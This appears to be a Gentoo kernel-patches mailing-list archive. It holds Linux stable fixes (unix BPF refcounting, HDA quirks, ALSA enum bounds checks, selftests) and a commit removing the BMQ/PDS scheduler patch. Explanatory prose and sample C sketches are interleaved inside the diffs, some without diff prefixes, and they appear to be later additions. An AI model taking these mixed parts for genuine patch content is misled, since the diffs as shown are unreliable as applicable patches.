++++ b/net/unix/unix_bpf.c
+@@ -159,12 +159,17 @@ int unix_dgram_bpf_update_proto(struct sock *sk, struct sk_psock *psock, bool re
+ 
+ int unix_stream_bpf_update_proto(struct sock *sk, struct sk_psock *psock, bool restore)
+ {
++	struct sock *sk_pair;
++
+ 	if (restore) {
+ 		sk->sk_write_space = psock->saved_write_space;
+ 		sock_replace_proto(sk, psock->sk_proto);
+ 		return 0;
+ 	}
+ 
++	sk_pair = unix_peer(sk);
++	sock_hold(sk_pair);
++	psock->sk_pair = sk_pair;
+ 	unix_stream_bpf_check_needs_rebuild(psock->sk_proto);
+ 	sock_replace_proto(sk, &unix_stream_bpf_prot);
+ 	return 0;
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index a88ed60dcd96a..1c8ffc5cf97f6 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9581,6 +9581,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x84da, "HP OMEN dc0019-ur", ALC295_FIXUP_HP_OMEN),
+ 	SND_PCI_QUIRK(0x103c, 0x84e7, "HP Pavilion 15", ALC269_FIXUP_HP_MUTE_LED_MIC3),
+ 	SND_PCI_QUIRK(0x103c, 0x8519, "HP Spectre x360 15-df0xxx", ALC285_FIXUP_HP_SPECTRE_X360),
++	SND_PCI_QUIRK(0x103c, 0x8537, "HP ProBook 440 G6", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x860f, "HP ZBook 15 G6", ALC285_FIXUP_HP_GPIO_AMP_INIT),
+ 	SND_PCI_QUIRK(0x103c, 0x861f, "HP Elite Dragonfly G1", ALC285_FIXUP_HP_GPIO_AMP_INIT),
+ 	SND_PCI_QUIRK(0x103c, 0x869d, "HP", ALC236_FIXUP_HP_MUTE_LED),
+@@ -9663,6 +9664,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x89c6, "Zbook Fury 17 G9", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x89ca, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x89d3, "HP EliteBook 645 G9 (MB 89D2)", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
++	SND_PCI_QUIRK(0x103c, 0x8a0f, "HP Pavilion 14-ec1xxx", ALC287_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8a20, "HP Laptop 15s-fq5xxx", ALC236_FIXUP_HP_MUTE_LED_COEFBIT2),
+ 	SND_PCI_QUIRK(0x103c, 0x8a25, "HP Victus 16-d1xxx (MB 8A25)", ALC245_FIXUP_HP_MUTE_LED_COEFBIT),
+ 	SND_PCI_QUIRK(0x103c, 0x8a78, "HP Dev One", ALC285_FIXUP_HP_LIMIT_INT_MIC_BOOST),
+@@ -9707,6 +9709,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8c70, "HP EliteBook 835 G11", ALC287_FIXUP_CS35L41_I2C_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8c71, "HP EliteBook 845 G11", ALC287_FIXUP_CS35L41_I2C_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8c72, "HP EliteBook 865 G11", ALC287_FIXUP_CS35L41_I2C_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8c96, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8ca4, "HP ZBook Fury", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8ca7, "HP ZBook Fury", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8cf5, "HP ZBook Studio 16", ALC245_FIXUP_CS35L41_SPI_4_HP_GPIO_LED),
+@@ -9904,6 +9907,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1558, 0xc019, "Clevo NH77D[BE]Q", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0xc022, "Clevo NH77[DC][QW]", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x17aa, 0x1036, "Lenovo P520", ALC233_FIXUP_LENOVO_MULTI_CODECS),
++	SND_PCI_QUIRK(0x17aa, 0x3882, "Lenovo Yoga Pro 7 14APH8", ALC287_FIXUP_YOGA9_14IAP7_BASS_SPK_PIN),
+ 	SND_PCI_QUIRK(0x17aa, 0x1048, "ThinkCentre Station", ALC623_FIXUP_LENOVO_THINKSTATION_P340),
+ 	SND_PCI_QUIRK(0x17aa, 0x20f2, "Thinkpad SL410/510", ALC269_FIXUP_SKU_IGNORE),
+ 	SND_PCI_QUIRK(0x17aa, 0x215e, "Thinkpad L512", ALC269_FIXUP_SKU_IGNORE),
+diff --git a/sound/soc/fsl/fsl_rpmsg.c b/sound/soc/fsl/fsl_rpmsg.c
+index bf94838bdbefe..5c07a8ff0c9c0 100644
+--- a/sound/soc/fsl/fsl_rpmsg.c
++++ b/sound/soc/fsl/fsl_rpmsg.c
+@@ -231,7 +231,7 @@ static int fsl_rpmsg_probe(struct platform_device *pdev)
+ 	ret = devm_snd_soc_register_component(&pdev->dev, &fsl_component,
+ 					      &fsl_rpmsg_dai, 1);
+ 	if (ret)
+-		return ret;
++		goto err_pm_disable;
+ 
+ 	rpmsg->card_pdev = platform_device_register_data(&pdev->dev,
+ 							 "imx-audio-rpmsg",
+@@ -241,16 +241,22 @@ static int fsl_rpmsg_probe(struct platform_device *pdev)
+ 	if (IS_ERR(rpmsg->card_pdev)) {
+ 		dev_err(&pdev->dev, "failed to register rpmsg card\n");
+ 		ret = PTR_ERR(rpmsg->card_pdev);
+-		return ret;
++		goto err_pm_disable;
+ 	}
+ 
+ 	return 0;
++
++err_pm_disable:
++	pm_runtime_disable(&pdev->dev);
++	return ret;
+ }
+ 
+ static int fsl_rpmsg_remove(struct platform_device *pdev)
+ {
+ 	struct fsl_rpmsg *rpmsg = platform_get_drvdata(pdev);
+ 
++	pm_runtime_disable(&pdev->dev);
++
+ 	if (rpmsg->card_pdev)
+ 		platform_device_unregister(rpmsg->card_pdev);
+ 
+diff --git a/sound/soc/mediatek/mt8186/mt8186-dai-adda.c b/sound/soc/mediatek/mt8186/mt8186-dai-adda.c
+index 094402470dc23..858b95b199dcb 100644
+--- a/sound/soc/mediatek/mt8186/mt8186-dai-adda.c
++++ b/sound/soc/mediatek/mt8186/mt8186-dai-adda.c
+@@ -499,7 +499,7 @@ static const struct snd_soc_dapm_widget mtk_dai_adda_widgets[] = {
+ 			      SND_SOC_DAPM_PRE_PMU | SND_SOC_DAPM_POST_PMD),
+ 
+ 	SND_SOC_DAPM_SUPPLY_S("AUD_PAD_TOP", SUPPLY_SEQ_ADDA_AUD_PAD_TOP,
+-			      0, 0, 0,
++			      AFE_AUD_PAD_TOP, RG_RX_FIFO_ON_SFT, 0,
+ 			      mtk_adda_pad_top_event,
+ 			      SND_SOC_DAPM_PRE_PMU),
+ 	SND_SOC_DAPM_SUPPLY_S("ADDA_MTKAIF_CFG", SUPPLY_SEQ_ADDA_MTKAIF_CFG,
+diff --git a/sound/soc/meson/g12a-toacodec.c b/sound/soc/meson/g12a-toacodec.c
+index ddc667956cf5e..8d8d848ebd58b 100644
+--- a/sound/soc/meson/g12a-toacodec.c
++++ b/sound/soc/meson/g12a-toacodec.c
+@@ -71,6 +71,9 @@ static int g12a_toacodec_mux_put_enum(struct snd_kcontrol *kcontrol,
+ 	struct soc_enum *e = (struct soc_enum *)kcontrol->private_value;
+ 	unsigned int mux, reg;
+ 
++	if (ucontrol->value.enumerated.item[0] >= e->items)
++		return -EINVAL;
++
+ 	mux = snd_soc_enum_item_to_val(e, ucontrol->value.enumerated.item[0]);
+ 	regmap_field_read(priv->field_dat_sel, &reg);
+ 
+@@ -101,7 +104,7 @@ static int g12a_toacodec_mux_put_enum(struct snd_kcontrol *kcontrol,
+ 
+ 	snd_soc_dapm_mux_update_power(dapm, kcontrol, mux, e, NULL);
+ 
+-	return 0;
++	return 1;
+ }
+ 
+ static SOC_ENUM_SINGLE_DECL(g12a_toacodec_mux_enum, TOACODEC_CTRL0,
+diff --git a/sound/soc/meson/g12a-tohdmitx.c b/sound/soc/meson/g12a-tohdmitx.c
+index 579a04ad4d197..154c324fdd42a 100644
+--- a/sound/soc/meson/g12a-tohdmitx.c
++++ b/sound/soc/meson/g12a-tohdmitx.c
+@@ -45,6 +45,9 @@ static int g12a_tohdmitx_i2s_mux_put_enum(struct snd_kcontrol *kcontrol,
+ 	struct soc_enum *e = (struct soc_enum *)kcontrol->private_value;
+ 	unsigned int mux, changed;
+ 
++	if (ucontrol->value.enumerated.item[0] >= e->items)
++		return -EINVAL;
++
+ 	mux = snd_soc_enum_item_to_val(e, ucontrol->value.enumerated.item[0]);
+ 	changed = snd_soc_component_test_bits(component, e->reg,
+ 					      CTRL0_I2S_DAT_SEL,
+@@ -93,6 +96,9 @@ static int g12a_tohdmitx_spdif_mux_put_enum(struct snd_kcontrol *kcontrol,
+ 	struct soc_enum *e = (struct soc_enum *)kcontrol->private_value;
+ 	unsigned int mux, changed;
+ 
++	if (ucontrol->value.enumerated.item[0] >= e->items)
++		return -EINVAL;
++
+ 	mux = snd_soc_enum_item_to_val(e, ucontrol->value.enumerated.item[0]);
+ 	changed = snd_soc_component_test_bits(component, TOHDMITX_CTRL0,
+ 					      CTRL0_SPDIF_SEL,
+@@ -112,7 +118,7 @@ static int g12a_tohdmitx_spdif_mux_put_enum(struct snd_kcontrol *kcontrol,
+ 
+ 	snd_soc_dapm_mux_update_power(dapm, kcontrol, mux, e, NULL);
+ 
+-	return 0;
++	return 1;
+ }
+ 
+ static SOC_ENUM_SINGLE_DECL(g12a_tohdmitx_spdif_mux_enum, TOHDMITX_CTRL0,
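+
+Two independent fixes repeat across the g12a-toacodec and g12a-tohdmitx
+hunks above: reject enum items at or beyond e->items (the index comes from
+userspace and must be range-checked before snd_soc_enum_item_to_val()), and
+return 1 instead of 0 when the put handler actually changed the value, which
+is what makes ALSA emit a control-change notification. A minimal put handler
+following both conventions (sketch; my_value_changed()/my_apply() are
+placeholders, not real API):
+
+    static int my_mux_put(struct snd_kcontrol *kcontrol,
+                          struct snd_ctl_elem_value *ucontrol)
+    {
+            struct soc_enum *e = (struct soc_enum *)kcontrol->private_value;
+
+            if (ucontrol->value.enumerated.item[0] >= e->items)
+                    return -EINVAL;           /* out-of-range index */
+
+            if (!my_value_changed(kcontrol, ucontrol))
+                    return 0;                 /* unchanged: no event */
+
+            my_apply(kcontrol, ucontrol);
+            return 1;                         /* changed: notify */
+    }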
+diff --git a/tools/testing/selftests/bpf/verifier/ld_imm64.c b/tools/testing/selftests/bpf/verifier/ld_imm64.c
+index f9297900cea6d..78f19c255f20b 100644
+--- a/tools/testing/selftests/bpf/verifier/ld_imm64.c
++++ b/tools/testing/selftests/bpf/verifier/ld_imm64.c
+@@ -9,8 +9,8 @@
+ 	BPF_MOV64_IMM(BPF_REG_0, 2),
+ 	BPF_EXIT_INSN(),
+ 	},
+-	.errstr = "invalid BPF_LD_IMM insn",
+-	.errstr_unpriv = "R1 pointer comparison",
++	.errstr = "jump into the middle of ldimm64 insn 1",
++	.errstr_unpriv = "jump into the middle of ldimm64 insn 1",
+ 	.result = REJECT,
+ },
+ {
+@@ -23,8 +23,8 @@
+ 	BPF_LD_IMM64(BPF_REG_0, 1),
+ 	BPF_EXIT_INSN(),
+ 	},
+-	.errstr = "invalid BPF_LD_IMM insn",
+-	.errstr_unpriv = "R1 pointer comparison",
++	.errstr = "jump into the middle of ldimm64 insn 1",
++	.errstr_unpriv = "jump into the middle of ldimm64 insn 1",
+ 	.result = REJECT,
+ },
+ {
+diff --git a/tools/testing/selftests/drivers/net/bonding/bond-arp-interval-causes-panic.sh b/tools/testing/selftests/drivers/net/bonding/bond-arp-interval-causes-panic.sh
+index 71c00bfafbc99..2ff58fed76e28 100755
+--- a/tools/testing/selftests/drivers/net/bonding/bond-arp-interval-causes-panic.sh
++++ b/tools/testing/selftests/drivers/net/bonding/bond-arp-interval-causes-panic.sh
+@@ -33,16 +33,16 @@ ip netns add "client"
+ ip link set dev link1_1 netns client down name eth0
+ ip netns exec client ip link add dev bond0 down type bond mode 1 \
+ 	miimon 100 all_slaves_active 1
+-ip netns exec client ip link set dev eth0 down master bond0
++ip netns exec client ip link set dev eth0 master bond0
+ ip netns exec client ip link set dev bond0 up
+ ip netns exec client ip addr add ${client_ip4}/24 dev bond0
+ ip netns exec client ping -c 5 $server_ip4 >/dev/null
+ 
+-ip netns exec client ip link set dev eth0 down nomaster
++ip netns exec client ip link set dev eth0 nomaster
+ ip netns exec client ip link set dev bond0 down
+ ip netns exec client ip link set dev bond0 type bond mode 0 \
+ 	arp_interval 1000 arp_ip_target "+${server_ip4}"
+-ip netns exec client ip link set dev eth0 down master bond0
++ip netns exec client ip link set dev eth0 master bond0
+ ip netns exec client ip link set dev bond0 up
+ ip netns exec client ping -c 5 $server_ip4 >/dev/null
+ 
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_join.sh b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+index e52d513009fb0..2107579e2939d 100755
+--- a/tools/testing/selftests/net/mptcp/mptcp_join.sh
++++ b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+@@ -2167,9 +2167,9 @@ link_failure_tests()
+ 		pm_nl_set_limits $ns1 0 2
+ 		pm_nl_add_endpoint $ns1 10.0.2.1 dev ns1eth2 flags signal
+ 		pm_nl_set_limits $ns2 1 2
+-		FAILING_LINKS="1"
+ 		pm_nl_add_endpoint $ns2 10.0.3.2 dev ns2eth3 flags subflow,backup
+-		run_tests $ns1 $ns2 10.0.1.1 1
++		FAILING_LINKS="1" \
++			run_tests $ns1 $ns2 10.0.1.1 1
+ 		chk_join_nr 2 2 2
+ 		chk_add_nr 1 1
+ 		chk_link_usage $ns2 ns2eth3 $cinsent 0
+@@ -2183,8 +2183,8 @@ link_failure_tests()
+ 		pm_nl_add_endpoint $ns1 10.0.2.1 dev ns1eth2 flags signal
+ 		pm_nl_set_limits $ns2 1 2
+ 		pm_nl_add_endpoint $ns2 10.0.3.2 dev ns2eth3 flags subflow,backup
+-		FAILING_LINKS="1 2"
+-		run_tests $ns1 $ns2 10.0.1.1 1
++		FAILING_LINKS="1 2" \
++			run_tests $ns1 $ns2 10.0.1.1 1
+ 		chk_join_nr 2 2 2
+ 		chk_add_nr 1 1
+ 		chk_stale_nr $ns2 2 4 2
+@@ -2199,8 +2199,8 @@ link_failure_tests()
+ 		pm_nl_add_endpoint $ns1 10.0.2.1 dev ns1eth2 flags signal
+ 		pm_nl_set_limits $ns2 1 3
+ 		pm_nl_add_endpoint $ns2 10.0.3.2 dev ns2eth3 flags subflow,backup
+-		FAILING_LINKS="1 2"
+-		run_tests $ns1 $ns2 10.0.1.1 2
++		FAILING_LINKS="1 2" \
++			run_tests $ns1 $ns2 10.0.1.1 2
+ 		chk_join_nr 2 2 2
+ 		chk_add_nr 1 1
+ 		chk_stale_nr $ns2 1 -1 2
+@@ -3041,7 +3041,7 @@ fastclose_tests()
+ 
+ 	if reset_check_counter "fastclose server test" "MPTcpExtMPFastcloseRx"; then
+ 		run_tests $ns1 $ns2 10.0.1.1 1024 0 fastclose_server
+-		chk_join_nr 0 0 0
++		chk_join_nr 0 0 0 0 0 0 1
+ 		chk_fclose_nr 1 1 invert
+ 		chk_rst_nr 1 1
+ 	fi
+diff --git a/tools/testing/selftests/vm/memfd_secret.c b/tools/testing/selftests/vm/memfd_secret.c
+index 957b9e18c7295..9b298f6a04b37 100644
+--- a/tools/testing/selftests/vm/memfd_secret.c
++++ b/tools/testing/selftests/vm/memfd_secret.c
+@@ -62,6 +62,9 @@ static void test_mlock_limit(int fd)
+ 	char *mem;
+ 
+ 	len = mlock_limit_cur;
++	if (len % page_size != 0)
++		len = (len/page_size) * page_size;
++
+ 	mem = mmap(NULL, len, prot, mode, fd, 0);
+ 	if (mem == MAP_FAILED) {
+ 		fail("unable to mmap secret memory\n");
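+
+The memfd_secret fix above rounds the RLIMIT_MEMLOCK value down to a whole
+number of pages before using it as an mmap() length, since the limit is in
+bytes and need not be page-aligned. Because page sizes are powers of two,
+the same rounding can also be written as a mask (equivalent arithmetic):
+
+    len &= ~(unsigned long)(page_size - 1);  /* round down to a page */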


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-01-05 14:54 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-01-05 14:54 UTC (permalink / raw
  To: gentoo-commits

commit:     1f7886178ead940a7f6b3d93d4ba917ec0d549d2
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Jan  5 14:54:35 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Jan  5 14:54:35 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=1f788617

BMQ fails dry-run, remove for investigation

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                 |     4 -
 5020_BMQ-and-PDS-io-scheduler-v6.1-r1.patch | 10236 --------------------------
 2 files changed, 10240 deletions(-)

diff --git a/0000_README b/0000_README
index b95d2a2c..248cb097 100644
--- a/0000_README
+++ b/0000_README
@@ -386,7 +386,3 @@ Desc:   Kernel fs for Linux that provides easier uid/gid-shifting for containers
 Patch:  5010_enable-cpu-optimizations-universal.patch
 From:   https://github.com/graysky2/kernel_compiler_patch
 Desc:   Kernel >= 5.15 patch enables gcc = v11.1+ optimizations for additional CPUs.
-
-Patch:  5020_BMQ-and-PDS-io-scheduler-v6.1-r1.patch
-From:   https://gitlab.com/alfredchen/projectc
-Desc:   BMQ(BitMap Queue) Scheduler. A new CPU scheduler developed from PDS(incld). Inspired by the scheduler in zircon.

diff --git a/5020_BMQ-and-PDS-io-scheduler-v6.1-r1.patch b/5020_BMQ-and-PDS-io-scheduler-v6.1-r1.patch
deleted file mode 100644
index 882261ca..00000000
--- a/5020_BMQ-and-PDS-io-scheduler-v6.1-r1.patch
+++ /dev/null
@@ -1,10236 +0,0 @@
-diff --git a/Documentation/admin-guide/kernel-parameters.txt b/Documentation/admin-guide/kernel-parameters.txt
-index 42af9ca0127e..31747ec54f9d 100644
---- a/Documentation/admin-guide/kernel-parameters.txt
-+++ b/Documentation/admin-guide/kernel-parameters.txt
-@@ -5406,6 +5406,12 @@
- 	sa1100ir	[NET]
- 			See drivers/net/irda/sa1100_ir.c.
-
-+	sched_timeslice=
-+			[KNL] Time slice in ms for Project C BMQ/PDS scheduler.
-+			Format: integer 2, 4
-+			Default: 4
-+			See Documentation/scheduler/sched-BMQ.txt
-+
- 	sched_verbose	[KNL] Enables verbose scheduler debug messages.
-
- 	schedstats=	[KNL,X86] Enable or disable scheduled statistics.
-diff --git a/Documentation/admin-guide/sysctl/kernel.rst b/Documentation/admin-guide/sysctl/kernel.rst
-index 98d1b198b2b4..d7c78a107f93 100644
---- a/Documentation/admin-guide/sysctl/kernel.rst
-+++ b/Documentation/admin-guide/sysctl/kernel.rst
-@@ -1552,3 +1552,13 @@ is 10 seconds.
-
- The softlockup threshold is (``2 * watchdog_thresh``). Setting this
- tunable to zero will disable lockup detection altogether.
-+
-+yield_type:
-+===========
-+
-+BMQ/PDS CPU scheduler only. This determines what type of yield a call
-+to sched_yield() will perform.
-+
-+  0 - No yield.
-+  1 - Deboost and requeue task. (default)
-+  2 - Set run queue skip task.
-diff --git a/Documentation/scheduler/sched-BMQ.txt b/Documentation/scheduler/sched-BMQ.txt
-new file mode 100644
-index 000000000000..05c84eec0f31
---- /dev/null
-+++ b/Documentation/scheduler/sched-BMQ.txt
-@@ -0,0 +1,110 @@
-+                         BitMap queue CPU Scheduler
-+                         --------------------------
-+
-+CONTENT
-+========
-+
-+ Background
-+ Design
-+   Overview
-+   Task policy
-+   Priority management
-+   BitMap Queue
-+   CPU Assignment and Migration
-+
-+
-+Background
-+==========
-+
-+BitMap Queue CPU scheduler, referred to as BMQ from here on, is an evolution
-+of previous Priority and Deadline based Skiplist multiple queue scheduler(PDS),
-+and inspired by the Zircon scheduler. The goal is to keep the scheduler code
-+simple, while staying efficient and scalable for interactive tasks such as
-+desktop use, movie playback and gaming.
-+
-+Design
-+======
-+
-+Overview
-+--------
-+
-+BMQ uses a per-CPU run queue design: each (logical) CPU has its own run
-+queue and is responsible for scheduling the tasks that are put into that
-+run queue.
-+
-+The run queue is a set of priority queues. In terms of data structure these
-+are FIFO queues for non-rt tasks and priority queues for rt tasks; see
-+BitMap Queue below for details. BMQ is optimized for non-rt tasks, given
-+that most applications are non-rt tasks. Whether a queue is FIFO or
-+priority, each queue is an ordered list of runnable tasks awaiting execution
-+and the data structures are the same. When it is time for a new task to run,
-+the scheduler simply looks for the lowest numbered queue that contains a
-+task and runs the first task from the head of that queue. The per-CPU idle
-+task is also in the run queue, so the scheduler can always find a task to
-+run from its run queue.
-+
-+Each task is assigned the same timeslice (default 4 ms) when it is picked to
-+start running. A task is reinserted at the end of the appropriate priority
-+queue when it has used up its whole timeslice. When the scheduler selects a
-+new task from the priority queue, it sets the CPU's preemption timer for the
-+remainder of the previous timeslice. When that timer fires, the scheduler
-+stops execution of that task, selects another task and starts over again.
-+
-+If a task blocks waiting for a shared resource, it is taken out of its
-+priority queue and placed in a wait queue for the shared resource. When it
-+is unblocked, it is reinserted in the appropriate priority queue of an
-+eligible CPU.
-+
-+Task policy
-+-----------
-+
-+BMQ supports DEADLINE, FIFO, RR, NORMAL, BATCH and IDLE task policies like
-+the mainline CFS scheduler, but it is heavily optimized for non-rt tasks,
-+that is, NORMAL/BATCH/IDLE policy tasks. The implementation details of each
-+policy follow.
-+
-+DEADLINE
-+	It is squashed into a priority 0 FIFO task.
-+
-+FIFO/RR
-+	All RT tasks share one single priority queue in the BMQ run queue
-+design. The complexity of the insert operation is O(n). BMQ is not designed
-+for systems that run mostly rt policy tasks.
-+
-+NORMAL/BATCH/IDLE
-+	BATCH and IDLE tasks are treated as the same policy. They compete for
-+CPU with NORMAL policy tasks, but they just don't boost. To control the
-+priority of NORMAL/BATCH/IDLE tasks, simply use nice levels.
-+
-+ISO
-+	ISO policy is not supported in BMQ. Please use a nice level -20 NORMAL
-+policy task instead.
-+
-+Priority management
-+-------------------
-+
-+RT tasks have priorities from 0 to 99. For non-rt tasks, three different
-+factors are used to determine the effective priority of a task; the
-+effective priority is what determines which queue the task will be in.
-+
-+The first factor is simply the task's static priority, which is assigned
-+from the task's nice level: [-20, 19] from userland's point of view and
-+[0, 39] internally.
-+
-+The second factor is the priority boost. This is a value bounded between
-+[-MAX_PRIORITY_ADJ, MAX_PRIORITY_ADJ] used to offset the base priority; it
-+is modified in the following cases:
-+
-+* When a thread has used up its entire timeslice, its boost is always
-+deboosted by increasing the value by one.
-+* When a thread gives up CPU control (voluntarily or not) to reschedule, and
-+its switch-in time (the time between the last switch-in and running) is
-+below the threshold based on its priority boost, its boost is raised by
-+decreasing the value by one, but it is capped at 0 (it won't go negative).
-+
-+The intent in this system is to ensure that interactive threads are serviced
-+quickly. These are usually the threads that interact directly with the user
-+and cause user-perceivable latency. These threads usually do little work and
-+spend most of their time blocked awaiting another user event. So they get the
-+priority boost from unblocking while background threads that do most of the
-+processing receive the priority penalty for using their entire timeslice.
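
The boost rules above can be condensed into a small model. This is an
illustrative sketch only, not the kernel implementation; the bounds follow
the text above, with MAX_PRIORITY_ADJ standing in for the BMQ constant.

/* Illustrative model of the boost rules (not kernel code). */
#define MAX_PRIORITY_ADJ	7	/* BMQ default bound */

struct demo_task {
	int static_prio;	/* nice level mapped to [0, 39] */
	int boost;		/* bounded offset to the base priority */
};

/* Whole timeslice used: deboost by increasing the offset by one. */
static void on_timeslice_expired(struct demo_task *t)
{
	if (t->boost < MAX_PRIORITY_ADJ)
		t->boost++;
}

/* Gave up the CPU soon after switch-in: boost by decreasing the offset,
 * capped at 0 as described above. */
static void on_quick_reschedule(struct demo_task *t)
{
	if (t->boost > 0)
		t->boost--;
}

/* The effective priority selects the queue the task is placed in. */
static int demo_effective_prio(const struct demo_task *t)
{
	return t->static_prio + t->boost;
}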
-diff --git a/fs/proc/base.c b/fs/proc/base.c
-index 9e479d7d202b..2a8530021b23 100644
---- a/fs/proc/base.c
-+++ b/fs/proc/base.c
-@@ -479,7 +479,7 @@ static int proc_pid_schedstat(struct seq_file *m, struct pid_namespace *ns,
- 		seq_puts(m, "0 0 0\n");
- 	else
- 		seq_printf(m, "%llu %llu %lu\n",
--		   (unsigned long long)task->se.sum_exec_runtime,
-+		   (unsigned long long)tsk_seruntime(task),
- 		   (unsigned long long)task->sched_info.run_delay,
- 		   task->sched_info.pcount);
-
-diff --git a/include/asm-generic/resource.h b/include/asm-generic/resource.h
-index 8874f681b056..59eb72bf7d5f 100644
---- a/include/asm-generic/resource.h
-+++ b/include/asm-generic/resource.h
-@@ -23,7 +23,7 @@
- 	[RLIMIT_LOCKS]		= {  RLIM_INFINITY,  RLIM_INFINITY },	\
- 	[RLIMIT_SIGPENDING]	= { 		0,	       0 },	\
- 	[RLIMIT_MSGQUEUE]	= {   MQ_BYTES_MAX,   MQ_BYTES_MAX },	\
--	[RLIMIT_NICE]		= { 0, 0 },				\
-+	[RLIMIT_NICE]		= { 30, 30 },				\
- 	[RLIMIT_RTPRIO]		= { 0, 0 },				\
- 	[RLIMIT_RTTIME]		= {  RLIM_INFINITY,  RLIM_INFINITY },	\
- }
-diff --git a/include/linux/sched.h b/include/linux/sched.h
-index ffb6eb55cd13..2e730a59caa2 100644
---- a/include/linux/sched.h
-+++ b/include/linux/sched.h
-@@ -762,8 +762,14 @@ struct task_struct {
- 	unsigned int			ptrace;
-
- #ifdef CONFIG_SMP
--	int				on_cpu;
- 	struct __call_single_node	wake_entry;
-+#endif
-+#if defined(CONFIG_SMP) || defined(CONFIG_SCHED_ALT)
-+	int				on_cpu;
-+#endif
-+
-+#ifdef CONFIG_SMP
-+#ifndef CONFIG_SCHED_ALT
- 	unsigned int			wakee_flips;
- 	unsigned long			wakee_flip_decay_ts;
- 	struct task_struct		*last_wakee;
-@@ -777,6 +783,7 @@ struct task_struct {
- 	 */
- 	int				recent_used_cpu;
- 	int				wake_cpu;
-+#endif /* !CONFIG_SCHED_ALT */
- #endif
- 	int				on_rq;
-
-@@ -785,6 +792,20 @@ struct task_struct {
- 	int				normal_prio;
- 	unsigned int			rt_priority;
-
-+#ifdef CONFIG_SCHED_ALT
-+	u64				last_ran;
-+	s64				time_slice;
-+	int				sq_idx;
-+	struct list_head		sq_node;
-+#ifdef CONFIG_SCHED_BMQ
-+	int				boost_prio;
-+#endif /* CONFIG_SCHED_BMQ */
-+#ifdef CONFIG_SCHED_PDS
-+	u64				deadline;
-+#endif /* CONFIG_SCHED_PDS */
-+	/* sched_clock time spent running */
-+	u64				sched_time;
-+#else /* !CONFIG_SCHED_ALT */
- 	struct sched_entity		se;
- 	struct sched_rt_entity		rt;
- 	struct sched_dl_entity		dl;
-@@ -795,6 +816,7 @@ struct task_struct {
- 	unsigned long			core_cookie;
- 	unsigned int			core_occupation;
- #endif
-+#endif /* !CONFIG_SCHED_ALT */
-
- #ifdef CONFIG_CGROUP_SCHED
- 	struct task_group		*sched_task_group;
-@@ -1545,6 +1567,15 @@ struct task_struct {
- 	 */
- };
-
-+#ifdef CONFIG_SCHED_ALT
-+#define tsk_seruntime(t)		((t)->sched_time)
-+/* replace the uncertain rt_timeout with 0UL */
-+#define tsk_rttimeout(t)		(0UL)
-+#else /* CFS */
-+#define tsk_seruntime(t)	((t)->se.sum_exec_runtime)
-+#define tsk_rttimeout(t)	((t)->rt.timeout)
-+#endif /* !CONFIG_SCHED_ALT */
-+
- static inline struct pid *task_pid(struct task_struct *task)
- {
- 	return task->thread_pid;
-diff --git a/include/linux/sched/deadline.h b/include/linux/sched/deadline.h
-index 7c83d4d5a971..fa30f98cb2be 100644
---- a/include/linux/sched/deadline.h
-+++ b/include/linux/sched/deadline.h
-@@ -1,5 +1,24 @@
- /* SPDX-License-Identifier: GPL-2.0 */
-
-+#ifdef CONFIG_SCHED_ALT
-+
-+static inline int dl_task(struct task_struct *p)
-+{
-+	return 0;
-+}
-+
-+#ifdef CONFIG_SCHED_BMQ
-+#define __tsk_deadline(p)	(0UL)
-+#endif
-+
-+#ifdef CONFIG_SCHED_PDS
-+#define __tsk_deadline(p)	((((u64) ((p)->prio))<<56) | (p)->deadline)
-+#endif
-+
-+#else
-+
-+#define __tsk_deadline(p)	((p)->dl.deadline)
-+
- /*
-  * SCHED_DEADLINE tasks has negative priorities, reflecting
-  * the fact that any of them has higher prio than RT and
-@@ -21,6 +40,7 @@ static inline int dl_task(struct task_struct *p)
- {
- 	return dl_prio(p->prio);
- }
-+#endif /* CONFIG_SCHED_ALT */
-
- static inline bool dl_time_before(u64 a, u64 b)
- {
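
Under PDS, __tsk_deadline() packs the task priority into the top byte of a
64-bit key so that one unsigned comparison orders tasks by priority first and
deadline second. A standalone sketch of that encoding (the explicit 56-bit
mask is illustrative; the macro above relies on deadlines fitting below bit
56):

#include <stdint.h>

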